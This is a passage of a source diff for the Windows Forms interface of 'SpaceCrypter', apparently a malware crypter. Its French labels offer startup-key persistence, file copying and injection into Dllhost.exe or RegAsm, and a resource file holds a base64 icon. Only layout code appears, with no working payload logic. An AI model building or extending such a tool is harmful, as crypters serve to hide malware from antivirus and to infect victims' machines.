|
||||
'
|
||||
'Label12
|
||||
'
|
||||
Me.Label12.AutoSize = True
|
||||
Me.Label12.Location = New System.Drawing.Point(7, 90)
|
||||
Me.Label12.Name = "Label12"
|
||||
Me.Label12.Size = New System.Drawing.Size(88, 13)
|
||||
Me.Label12.TabIndex = 18
|
||||
Me.Label12.Text = "Copier le fichier : "
|
||||
'
|
||||
'Label11
|
||||
'
|
||||
Me.Label11.AutoSize = True
|
||||
Me.Label11.Location = New System.Drawing.Point(7, 14)
|
||||
Me.Label11.Name = "Label11"
|
||||
Me.Label11.Size = New System.Drawing.Size(100, 13)
|
||||
Me.Label11.TabIndex = 17
|
||||
Me.Label11.Text = "Ajouter un StartUp :"
|
||||
'
|
||||
'Label10
|
||||
'
|
||||
Me.Label10.AutoSize = True
|
||||
Me.Label10.Location = New System.Drawing.Point(260, 14)
|
||||
Me.Label10.Name = "Label10"
|
||||
Me.Label10.Size = New System.Drawing.Size(53, 13)
|
||||
Me.Label10.TabIndex = 16
|
||||
Me.Label10.Text = "Injection :"
|
||||
'
|
||||
'Label9
|
||||
'
|
||||
Me.Label9.AutoSize = True
|
||||
Me.Label9.Location = New System.Drawing.Point(257, 72)
|
||||
Me.Label9.Name = "Label9"
|
||||
Me.Label9.Size = New System.Drawing.Size(83, 13)
|
||||
Me.Label9.TabIndex = 15
|
||||
Me.Label9.Text = "Type du fichier :"
|
||||
'
|
||||
'Acheter
|
||||
'
|
||||
Me.Acheter.Font = New System.Drawing.Font("Microsoft Sans Serif", 10.0!)
|
||||
Me.Acheter.ForeColor = System.Drawing.Color.Red
|
||||
Me.Acheter.Location = New System.Drawing.Point(285, 170)
|
||||
Me.Acheter.Name = "Acheter"
|
||||
Me.Acheter.Size = New System.Drawing.Size(143, 37)
|
||||
Me.Acheter.TabIndex = 14
|
||||
Me.Acheter.Text = "Clique ici"
|
||||
Me.Acheter.UseVisualStyleBackColor = True
|
||||
'
|
||||
'Label6
|
||||
'
|
||||
Me.Label6.AutoSize = True
|
||||
Me.Label6.Font = New System.Drawing.Font("Microsoft Sans Serif", 10.0!)
|
||||
Me.Label6.ForeColor = System.Drawing.Color.Red
|
||||
Me.Label6.Location = New System.Drawing.Point(260, 129)
|
||||
Me.Label6.Name = "Label6"
|
||||
Me.Label6.Size = New System.Drawing.Size(194, 34)
|
||||
Me.Label6.TabIndex = 13
|
||||
Me.Label6.Text = "Besoin de plus de fonctions ?" & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "Achete SpaceCrypter !"
|
||||
Me.Label6.TextAlign = System.Drawing.ContentAlignment.BottomCenter
|
||||
'
|
||||
'GroupBoxType
|
||||
'
|
||||
Me.GroupBoxType.Controls.Add(Me.RadioButtonNatif)
|
||||
Me.GroupBoxType.Controls.Add(Me.RadioButtonNet)
|
||||
Me.GroupBoxType.Location = New System.Drawing.Point(257, 83)
|
||||
Me.GroupBoxType.Name = "GroupBoxType"
|
||||
Me.GroupBoxType.Size = New System.Drawing.Size(200, 41)
|
||||
Me.GroupBoxType.TabIndex = 12
|
||||
Me.GroupBoxType.TabStop = False
|
||||
'
|
||||
'RadioButtonNatif
|
||||
'
|
||||
Me.RadioButtonNatif.AutoSize = True
|
||||
Me.RadioButtonNatif.Checked = True
|
||||
Me.RadioButtonNatif.Location = New System.Drawing.Point(124, 15)
|
||||
Me.RadioButtonNatif.Name = "RadioButtonNatif"
|
||||
Me.RadioButtonNatif.Size = New System.Drawing.Size(47, 17)
|
||||
Me.RadioButtonNatif.TabIndex = 1
|
||||
Me.RadioButtonNatif.TabStop = True
|
||||
Me.RadioButtonNatif.Text = "Natif"
|
||||
Me.RadioButtonNatif.UseVisualStyleBackColor = True
|
||||
'
|
||||
'RadioButtonNet
|
||||
'
|
||||
Me.RadioButtonNet.AutoSize = True
|
||||
Me.RadioButtonNet.Location = New System.Drawing.Point(28, 15)
|
||||
Me.RadioButtonNet.Name = "RadioButtonNet"
|
||||
Me.RadioButtonNet.Size = New System.Drawing.Size(50, 17)
|
||||
Me.RadioButtonNet.TabIndex = 0
|
||||
Me.RadioButtonNet.Text = ".NET"
|
||||
Me.RadioButtonNet.UseVisualStyleBackColor = True
|
||||
'
|
||||
'GroupBoxInjection
|
||||
'
|
||||
Me.GroupBoxInjection.Controls.Add(Me.RadioButtonReg)
|
||||
Me.GroupBoxInjection.Controls.Add(Me.RadioButtonDll)
|
||||
Me.GroupBoxInjection.Location = New System.Drawing.Point(257, 24)
|
||||
Me.GroupBoxInjection.Name = "GroupBoxInjection"
|
||||
Me.GroupBoxInjection.Size = New System.Drawing.Size(200, 41)
|
||||
Me.GroupBoxInjection.TabIndex = 10
|
||||
Me.GroupBoxInjection.TabStop = False
|
||||
'
|
||||
'RadioButtonReg
|
||||
'
|
||||
Me.RadioButtonReg.AutoSize = True
|
||||
Me.RadioButtonReg.Enabled = False
|
||||
Me.RadioButtonReg.Location = New System.Drawing.Point(125, 14)
|
||||
Me.RadioButtonReg.Name = "RadioButtonReg"
|
||||
Me.RadioButtonReg.Size = New System.Drawing.Size(65, 17)
|
||||
Me.RadioButtonReg.TabIndex = 1
|
||||
Me.RadioButtonReg.Text = "RegAsm"
|
||||
Me.RadioButtonReg.UseVisualStyleBackColor = True
|
||||
'
|
||||
'RadioButtonDll
|
||||
'
|
||||
Me.RadioButtonDll.AutoSize = True
|
||||
Me.RadioButtonDll.Checked = True
|
||||
Me.RadioButtonDll.Location = New System.Drawing.Point(6, 14)
|
||||
Me.RadioButtonDll.Name = "RadioButtonDll"
|
||||
Me.RadioButtonDll.Size = New System.Drawing.Size(77, 17)
|
||||
Me.RadioButtonDll.TabIndex = 0
|
||||
Me.RadioButtonDll.TabStop = True
|
||||
Me.RadioButtonDll.Text = "Dllhost.exe"
|
||||
Me.RadioButtonDll.UseVisualStyleBackColor = True
|
||||
'
|
||||
'GroupBoxCopier
|
||||
'
|
||||
Me.GroupBoxCopier.Controls.Add(Me.TextBoxFichiercop)
|
||||
Me.GroupBoxCopier.Controls.Add(Me.Label5)
|
||||
Me.GroupBoxCopier.Controls.Add(Me.TextBoxDossier)
|
||||
Me.GroupBoxCopier.Controls.Add(Me.Label4)
|
||||
Me.GroupBoxCopier.Location = New System.Drawing.Point(7, 105)
|
||||
Me.GroupBoxCopier.Name = "GroupBoxCopier"
|
||||
Me.GroupBoxCopier.Size = New System.Drawing.Size(244, 102)
|
||||
Me.GroupBoxCopier.TabIndex = 9
|
||||
Me.GroupBoxCopier.TabStop = False
|
||||
'
|
||||
'TextBoxFichiercop
|
||||
'
|
||||
Me.TextBoxFichiercop.Location = New System.Drawing.Point(6, 71)
|
||||
Me.TextBoxFichiercop.Name = "TextBoxFichiercop"
|
||||
Me.TextBoxFichiercop.Size = New System.Drawing.Size(232, 20)
|
||||
Me.TextBoxFichiercop.TabIndex = 10
|
||||
'
|
||||
'Label5
|
||||
'
|
||||
Me.Label5.AutoSize = True
|
||||
Me.Label5.Location = New System.Drawing.Point(6, 55)
|
||||
Me.Label5.Name = "Label5"
|
||||
Me.Label5.Size = New System.Drawing.Size(81, 13)
|
||||
Me.Label5.TabIndex = 9
|
||||
Me.Label5.Text = "Nom du fichier :"
|
||||
'
|
||||
'TextBoxDossier
|
||||
'
|
||||
Me.TextBoxDossier.Location = New System.Drawing.Point(6, 30)
|
||||
Me.TextBoxDossier.Name = "TextBoxDossier"
|
||||
Me.TextBoxDossier.Size = New System.Drawing.Size(232, 20)
|
||||
Me.TextBoxDossier.TabIndex = 8
|
||||
'
|
||||
'Label4
|
||||
'
|
||||
Me.Label4.AutoSize = True
|
||||
Me.Label4.Location = New System.Drawing.Point(3, 14)
|
||||
Me.Label4.Name = "Label4"
|
||||
Me.Label4.Size = New System.Drawing.Size(86, 13)
|
||||
Me.Label4.TabIndex = 0
|
||||
Me.Label4.Text = "Nom du dossier :"
|
||||
'
|
||||
'GroupBoxStartup
|
||||
'
|
||||
Me.GroupBoxStartup.Controls.Add(Me.TextBoxClestartup)
|
||||
Me.GroupBoxStartup.Controls.Add(Me.Label3)
|
||||
Me.GroupBoxStartup.Location = New System.Drawing.Point(7, 24)
|
||||
Me.GroupBoxStartup.Name = "GroupBoxStartup"
|
||||
Me.GroupBoxStartup.Size = New System.Drawing.Size(244, 63)
|
||||
Me.GroupBoxStartup.TabIndex = 7
|
||||
Me.GroupBoxStartup.TabStop = False
|
||||
'
|
||||
'TextBoxClestartup
|
||||
'
|
||||
Me.TextBoxClestartup.Location = New System.Drawing.Point(6, 32)
|
||||
Me.TextBoxClestartup.Name = "TextBoxClestartup"
|
||||
Me.TextBoxClestartup.Size = New System.Drawing.Size(232, 20)
|
||||
Me.TextBoxClestartup.TabIndex = 8
|
||||
'
|
||||
'Label3
|
||||
'
|
||||
Me.Label3.AutoSize = True
|
||||
Me.Label3.Location = New System.Drawing.Point(3, 16)
|
||||
Me.Label3.Name = "Label3"
|
||||
Me.Label3.Size = New System.Drawing.Size(78, 13)
|
||||
Me.Label3.TabIndex = 0
|
||||
Me.Label3.Text = "Nom de la clé :"
|
||||
'
|
||||
'Button2
|
||||
'
|
||||
Me.Button2.Location = New System.Drawing.Point(355, 248)
|
||||
Me.Button2.Name = "Button2"
|
||||
Me.Button2.Size = New System.Drawing.Size(107, 23)
|
||||
Me.Button2.TabIndex = 9
|
||||
Me.Button2.Text = "Cypter mon fichier"
|
||||
Me.Button2.UseVisualStyleBackColor = True
|
||||
'
|
||||
'ProgressBar1
|
||||
'
|
||||
Me.ProgressBar1.Location = New System.Drawing.Point(5, 248)
|
||||
Me.ProgressBar1.Name = "ProgressBar1"
|
||||
Me.ProgressBar1.Size = New System.Drawing.Size(344, 23)
|
||||
Me.ProgressBar1.TabIndex = 10
|
||||
'
|
||||
'RandomPool1
|
||||
'
|
||||
Me.RandomPool1.BackColor = System.Drawing.Color.White
|
||||
Me.RandomPool1.Image = Nothing
|
||||
Me.RandomPool1.Location = New System.Drawing.Point(10, 99)
|
||||
Me.RandomPool1.Name = "RandomPool1"
|
||||
Me.RandomPool1.NoRounding = False
|
||||
Me.RandomPool1.Range = "0123456789ABCDEF"
|
||||
Me.RandomPool1.RangePadding = 2
|
||||
Me.RandomPool1.Size = New System.Drawing.Size(449, 61)
|
||||
Me.RandomPool1.TabIndex = 5
|
||||
Me.RandomPool1.Text = "RandomPool1"
|
||||
'
|
||||
'Form1
|
||||
'
|
||||
Me.AutoScaleDimensions = New System.Drawing.SizeF(6.0!, 13.0!)
|
||||
Me.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font
|
||||
Me.ClientSize = New System.Drawing.Size(474, 275)
|
||||
Me.Controls.Add(Me.ProgressBar1)
|
||||
Me.Controls.Add(Me.Button2)
|
||||
Me.Controls.Add(Me.TabControl1)
|
||||
Me.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedSingle
|
||||
Me.Icon = CType(resources.GetObject("$this.Icon"), System.Drawing.Icon)
|
||||
Me.MaximizeBox = False
|
||||
Me.Name = "Form1"
|
||||
Me.Text = "SpaceCrypter - Free Edition | v1.0"
|
||||
Me.TabControl1.ResumeLayout(False)
|
||||
Me.TabPage1.ResumeLayout(False)
|
||||
Me.TabPage1.PerformLayout()
|
||||
CType(Me.PictureIcon, System.ComponentModel.ISupportInitialize).EndInit()
|
||||
Me.TabPage2.ResumeLayout(False)
|
||||
Me.TabPage2.PerformLayout()
|
||||
Me.GroupBoxType.ResumeLayout(False)
|
||||
Me.GroupBoxType.PerformLayout()
|
||||
Me.GroupBoxInjection.ResumeLayout(False)
|
||||
Me.GroupBoxInjection.PerformLayout()
|
||||
Me.GroupBoxCopier.ResumeLayout(False)
|
||||
Me.GroupBoxCopier.PerformLayout()
|
||||
Me.GroupBoxStartup.ResumeLayout(False)
|
||||
Me.GroupBoxStartup.PerformLayout()
|
||||
Me.ResumeLayout(False)
|
||||
|
||||
End Sub
|
||||
|
||||
Friend WithEvents Button1 As Button
|
||||
Friend WithEvents ChargerFichier As Button
|
||||
Friend WithEvents TextBoxFichier As TextBox
|
||||
Friend WithEvents Label1 As Label
|
||||
Friend WithEvents Label2 As Label
|
||||
Friend WithEvents RandomPool1 As RandomPool
|
||||
Friend WithEvents TabControl1 As TabControl
|
||||
Friend WithEvents TabPage1 As TabPage
|
||||
Friend WithEvents ButtonChangerIco As Button
|
||||
Friend WithEvents PictureIcon As PictureBox
|
||||
Friend WithEvents CheckBoxIcon As CheckBox
|
||||
Friend WithEvents Label8 As Label
|
||||
Friend WithEvents Label7 As Label
|
||||
Friend WithEvents TabPage2 As TabPage
|
||||
Friend WithEvents Acheter As Button
|
||||
Friend WithEvents Label6 As Label
|
||||
Friend WithEvents GroupBoxType As GroupBox
|
||||
Friend WithEvents RadioButtonNatif As RadioButton
|
||||
Friend WithEvents RadioButtonNet As RadioButton
|
||||
Friend WithEvents GroupBoxInjection As GroupBox
|
||||
Friend WithEvents RadioButtonReg As RadioButton
|
||||
Friend WithEvents RadioButtonDll As RadioButton
|
||||
Friend WithEvents GroupBoxCopier As GroupBox
|
||||
Friend WithEvents TextBoxFichiercop As TextBox
|
||||
Friend WithEvents Label5 As Label
|
||||
Friend WithEvents TextBoxDossier As TextBox
|
||||
Friend WithEvents Label4 As Label
|
||||
Friend WithEvents GroupBoxStartup As GroupBox
|
||||
Friend WithEvents TextBoxClestartup As TextBox
|
||||
Friend WithEvents Label3 As Label
|
||||
Friend WithEvents TextBoxEncryption As TextBox
|
||||
Friend WithEvents Label9 As Label
|
||||
Friend WithEvents Label10 As Label
|
||||
Friend WithEvents Button2 As Button
|
||||
Friend WithEvents ProgressBar1 As ProgressBar
|
||||
Friend WithEvents Label12 As Label
|
||||
Friend WithEvents Label11 As Label
|
||||
End Class
|
||||
@@ -0,0 +1,659 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<root>
|
||||
<!--
|
||||
Microsoft ResX Schema
|
||||
|
||||
Version 2.0
|
||||
|
||||
The primary goals of this format is to allow a simple XML format
|
||||
that is mostly human readable. The generation and parsing of the
|
||||
various data types are done through the TypeConverter classes
|
||||
associated with the data types.
|
||||
|
||||
Example:
|
||||
|
||||
... ado.net/XML headers & schema ...
|
||||
<resheader name="resmimetype">text/microsoft-resx</resheader>
|
||||
<resheader name="version">2.0</resheader>
|
||||
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
|
||||
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
|
||||
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
|
||||
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
|
||||
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
|
||||
<value>[base64 mime encoded serialized .NET Framework object]</value>
|
||||
</data>
|
||||
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
||||
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
|
||||
<comment>This is a comment</comment>
|
||||
</data>
|
||||
|
||||
There are any number of "resheader" rows that contain simple
|
||||
name/value pairs.
|
||||
|
||||
Each data row contains a name, and value. The row also contains a
|
||||
type or mimetype. Type corresponds to a .NET class that support
|
||||
text/value conversion through the TypeConverter architecture.
|
||||
Classes that don't support this are serialized and stored with the
|
||||
mimetype set.
|
||||
|
||||
The mimetype is used for serialized objects, and tells the
|
||||
ResXResourceReader how to depersist the object. This is currently not
|
||||
extensible. For a given mimetype the value must be set accordingly:
|
||||
|
||||
Note - application/x-microsoft.net.object.binary.base64 is the format
|
||||
that the ResXResourceWriter will generate, however the reader can
|
||||
read any of the formats listed below.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.binary.base64
|
||||
value : The object must be serialized with
|
||||
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
|
||||
: and then encoded with base64 encoding.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.soap.base64
|
||||
value : The object must be serialized with
|
||||
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
|
||||
: and then encoded with base64 encoding.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.bytearray.base64
|
||||
value : The object must be serialized into a byte array
|
||||
: using a System.ComponentModel.TypeConverter
|
||||
: and then encoded with base64 encoding.
|
||||
-->
|
||||
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
|
||||
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
|
||||
<xsd:element name="root" msdata:IsDataSet="true">
|
||||
<xsd:complexType>
|
||||
<xsd:choice maxOccurs="unbounded">
|
||||
<xsd:element name="metadata">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" use="required" type="xsd:string" />
|
||||
<xsd:attribute name="type" type="xsd:string" />
|
||||
<xsd:attribute name="mimetype" type="xsd:string" />
|
||||
<xsd:attribute ref="xml:space" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="assembly">
|
||||
<xsd:complexType>
|
||||
<xsd:attribute name="alias" type="xsd:string" />
|
||||
<xsd:attribute name="name" type="xsd:string" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="data">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
||||
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
|
||||
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
|
||||
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
|
||||
<xsd:attribute ref="xml:space" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="resheader">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" type="xsd:string" use="required" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
</xsd:choice>
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
</xsd:schema>
|
||||
<resheader name="resmimetype">
|
||||
<value>text/microsoft-resx</value>
|
||||
</resheader>
|
||||
<resheader name="version">
|
||||
<value>2.0</value>
|
||||
</resheader>
|
||||
<resheader name="reader">
|
||||
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||||
</resheader>
|
||||
<resheader name="writer">
|
||||
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||||
</resheader>
|
||||
<assembly alias="System.Drawing" name="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
|
||||
<data name="$this.Icon" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
||||
<value>
|
||||
AAABAAQAEBAAAAAAIABoBAAARgAAACAgAAAAACAAqBAAAK4EAAAwMAAAAAAgAKglAABWFQAAQEAAAAAA
|
||||
IAAoQgAA/joAACgAAAAQAAAAIAAAAAEAIAAAAAAAQAQAAAAAAAAAAAAAAAAAAAAAAAD///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8BoHpcH6B6XJHYonWR2KJ1H////wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wGgelwToHpclaB6XPmgelz/2KJ1/9iidfnYonWV2KJ1E////wH///8B////Af//
|
||||
/wH///8B////Af///wGgelw7oHpc6aB6XP+gelz/oHpc/9iidf/YonX/2KJ1/9iidenYonU7////Af//
|
||||
/wH///8B////Af///wGgelwVoHpc7aB6XP+gelz/oHpc/6B6XP/YonX/2KJ1/9iidf/YonX/2KJ17dii
|
||||
dRX///8B////Af///wH///8BoHpccaB6XP+gelz/pYNo/76qkf/Kupv/0bmM/9W3k//Yp3//2KJ1/9ii
|
||||
df/YonVx////Af///wH///8B////AauCYbWgelz/rI53/9PPwv/Z0LD/ycGj/7+yh//PwZP/1c+9/9iu
|
||||
i//YonX/2KJ1tf///wH///8B////Af///wHYonXhxpl1/9PS0f/RyKf/wbWN/2xnVf9oYUn/v7KH/9HI
|
||||
qP/Y1tP/2KZ8/9iideH///8B////Af///wHYonUJ2KJ1/dimfP/Y1tP/0cio/76xh/9oYUn/aGFJ/7+y
|
||||
h//RyKj/2NbT/9imfP/YonX92KJ1Cf///wH///8B2KJ1J9iidf/YonX/2K6L/9XOvf/PwZP/v7KH/7+y
|
||||
h//PwZP/1c+9/9iui//YonX/2KJ1/9iidSf///8B////AdiidUPYonX/2KJ1/9iidf/Yp3//1beT/9G5
|
||||
jP/UwJf/2cCg/9inf//YonX/2KJ1/9iidf/YonVD////Af///wHYonVb2KJ1/9iidf/YonX/2KJ1/9ii
|
||||
df/YonX/5L6f/+S+n//huJb/26l//9iidf/YonX/2KJ1Wf///wH///8B2KJ1c9iidf/YonX/2KJ1/9ii
|
||||
df/YonX/2KJ1/+S+n//kvp//5L6f/+S+n//gtZH/2aV6/9iidXP///8B////AdiidTnYonU72KJ1Fdii
|
||||
dRHYonU72KJ1m9iidfvkvp/75L6fm+S+nzvkvp8R5L6fFeK7mjvbqoE5////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wHYonU35L6fN////wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8BAAD//wAA
|
||||
//8AAP//AAD//wAA//8AAP//AAD//wAA//8AAP//AAD//wAA//8AAP//AAD//wAA//8AAP//AAD//ygA
|
||||
AAAgAAAAQAAAAAEAIAAAAAAAgBAAAAAAAAAAAAAAAAAAAAAAAAD///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wGgelwFoHpcXdii
|
||||
dV3YonUF////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wGgelwJoHpcb6B6
|
||||
XOegelz/2KJ1/9iidefYonVv2KJ1Cf///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wGgelwJoHpcb6B6
|
||||
XOegelz/oHpc/6B6XP/YonX/2KJ1/9iidf/YonXn2KJ1b9iidQn///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8BoHpcSaB6
|
||||
XNugelz/oHpc/6B6XP+gelz/oHpc/9iidf/YonX/2KJ1/9iidf/YonX/2KJ129iidUn///8B////Af//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8BoHpcDaB6
|
||||
XKOgelz/oHpc/6B6XP+gelz/oHpc/6B6XP+gelz/2KJ1/9iidf/YonX/2KJ1/9iidf/YonX/2KJ1/9ii
|
||||
daPYonUN////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////AaB6
|
||||
XBGgelzPoHpc/6B6XP+gelz/oHpc/6B6XP+gelz/oHpc/6B6XP/YonX/2KJ1/9iidf/YonX/2KJ1/9ii
|
||||
df/YonX/2KJ1/9iidc/YonUR////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8BoHpcs6B6XP+gelz/oHpc/6B6XP+gelz/oHpc/6B6XP+gelz/oHpc/9iidf/YonX/2KJ1/9ii
|
||||
df/YonX/2KJ1/9iidf/YonX/2KJ1/9iidbP///8B////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////AaB6XFGgelz/oHpc/6B6XP+gelz/oHpc/6B6XP+gelz/oHpc/6B6XP+gelz/2KJ1/9ii
|
||||
df/YonX/2KJ1/9iidf/YonX/2KJ1/9iidf/YonX/2KJ1/9iidVH///8B////Af///wH///8B////Af//
|
||||
/wH///8B////Af///wH///8BoHpct6B6XP+gelz/oHpc/6B6XP+gelz/oHpc/6B6XP+tkHj/uqKG/72l
|
||||
hv/TsYT/1LKI/9euiv/YonX/2KJ1/9iidf/YonX/2KJ1/9iidf/YonX/2KJ1t////wH///8B////Af//
|
||||
/wH///8B////Af///wH///8B////AaB6XBGgelz7oHpc/6B6XP+gelz/oHpc/6B6XP+2oI7/0sy+/9rR
|
||||
s//a0bH/2tGx/8/Bk//PwZP/z8KX/9XLt//YuJ7/2KJ1/9iidf/YonX/2KJ1/9iidf/YonX72KJ1Ef//
|
||||
/wH///8B////Af///wH///8B////Af///wH///8BoHpcUaB6XP+gelz/oHpc/6B6XP+ifmL/yMC5/9nY
|
||||
zv/a0bH/2tGx/9rRsf/a0bH/z8GT/8/Bk//PwZP/z8GT/9XTxP/Yy8D/2KR6/9iidf/YonX/2KJ1/9ii
|
||||
df/YonVR////Af///wH///8B////Af///wH///8B////Af///wHFlGyDrYNi/6B6XP+gelz/oX1g/8vF
|
||||
v//Y2tr/1Mql/9nQsP/a0bH/zMSm/6Wehv+ckm//wrWJ/8/Bk//PwZP/z8KX/9ja2v/YzsX/2KN4/9ii
|
||||
df/YonX/2KJ1/9iidYP///8B////Af///wH///8B////Af///wH///8B////Adiida/YonX/xZRs/6d/
|
||||
X//Ctav/2dze/9XRwf/PwZP/0MKW/8i+nP9ybVz/bWhY/2dgSf9sZEz/wrWJ/8/Bk//PwZP/1dHB/9nc
|
||||
3v/YxbX/2KJ1/9iidf/YonX/2KJ1r////wH///8B////Af///wH///8B////Af///wH///8B2KJ119ii
|
||||
df/YonX/1rKT/9nc3v/Z3N7/0822/8/Bk//PwZP/nJJv/2hiTP9rZlX/Z2BJ/2dgSf+ckm//z8GT/8/B
|
||||
k//Uzrj/2dze/9nc3v/YspL/2KJ1/9iidf/YonXX////Af///wH///8B////Af///wH///8B////Af//
|
||||
/wHYonX72KJ1/9iidf/Ys5T/2dze/9nc3v/Uzrj/z8GT/8/Bk/+ckm//Z2BJ/2dgSf9nYEn/Z2BJ/5yS
|
||||
b//PwZP/z8GT/9TOuP/Z3N7/2dze/9iykv/YonX/2KJ1/9iidfv///8B////Af///wH///8B////Af//
|
||||
/wH///8B2KJ1Idiidf/YonX/2KJ1/9iidf/YxbX/2dze/9XRwf/PwZP/z8GT/8CziP9sZEz/Z2BJ/2dg
|
||||
Sf9sZEz/wrWJ/8/Bk//PwZP/1dHB/9nc3v/YxbX/2KJ1/9iidf/YonX/2KJ1/9iidSH///8B////Af//
|
||||
/wH///8B////Af///wHYonVB2KJ1/9iidf/YonX/2KJ1/9ijeP/YzsX/2NrZ/8/Cl//PwZP/z8GT/8K1
|
||||
if+ckm//nJJv/8K1if/PwZP/z8GT/8/Cl//Y2tr/2M7F/9ijeP/YonX/2KJ1/9iidf/YonX/2KJ1Qf//
|
||||
/wH///8B////Af///wH///8B////AdiidVvYonX/2KJ1/9iidf/YonX/2KJ1/9ikev/Yy8D/1dPE/8/B
|
||||
k//PwZP/z8GT/8/Bk//PwZP/z8GT/8/Bk//PwZP/1dPE/9jLwP/YpHr/2KJ1/9iidf/YonX/2KJ1/9ii
|
||||
df/YonVb////Af///wH///8B////Af///wH///8B2KJ1d9iidf/YonX/2KJ1/9iidf/YonX/2KJ1/9ii
|
||||
df/YuJ7/1cu3/8/Cl//PwZP/z8GT/8/Bk//PwZP/z8KX/9XLt//YuJ7/2KJ1/9iidf/YonX/2KJ1/9ii
|
||||
df/YonX/2KJ1/9iidXf///8B////Af///wH///8B////Af///wHYonWP2KJ1/9iidf/YonX/2KJ1/9ii
|
||||
df/YonX/2KJ1/9iidf/YonX/166K/9SyiP/TsYT/2b+Z/9vBn//gw6j/3a+J/9ijdv/YonX/2KJ1/9ii
|
||||
df/YonX/2KJ1/9iidf/YonX/2KJ1j////wH///8B////Af///wH///8B////AdiidafYonX/2KJ1/9ii
|
||||
df/YonX/2KJ1/9iidf/YonX/2KJ1/9iidf/YonX/2KJ1/9iidf/kvp//5L6f/+S+n//kvp//4rqZ/9ys
|
||||
hP/YonX/2KJ1/9iidf/YonX/2KJ1/9iidf/YonWj////Af///wH///8B////Af///wH///8B2KJ1v9ii
|
||||
df/YonX/2KJ1/9iidf/YonX/2KJ1/9iidf/YonX/2KJ1/9iidf/YonX/2KJ1/+S+n//kvp//5L6f/+S+
|
||||
n//kvp//5L6f/+G4lv/aqH7/2KJ1/9iidf/YonX/2KJ1/9iidb////8B////Af///wH///8B////Af//
|
||||
/wHYonXb2KJ1/9iidf/YonX/2KJ1/9iidf/YonX/2KJ1/9iidf/YonX/2KJ1/9iidf/YonX/5L6f/+S+
|
||||
n//kvp//5L6f/+S+n//kvp//5L6f/+S+n//ftJD/2aV6/9iidf/YonX/2KJ12////wH///8B////Af//
|
||||
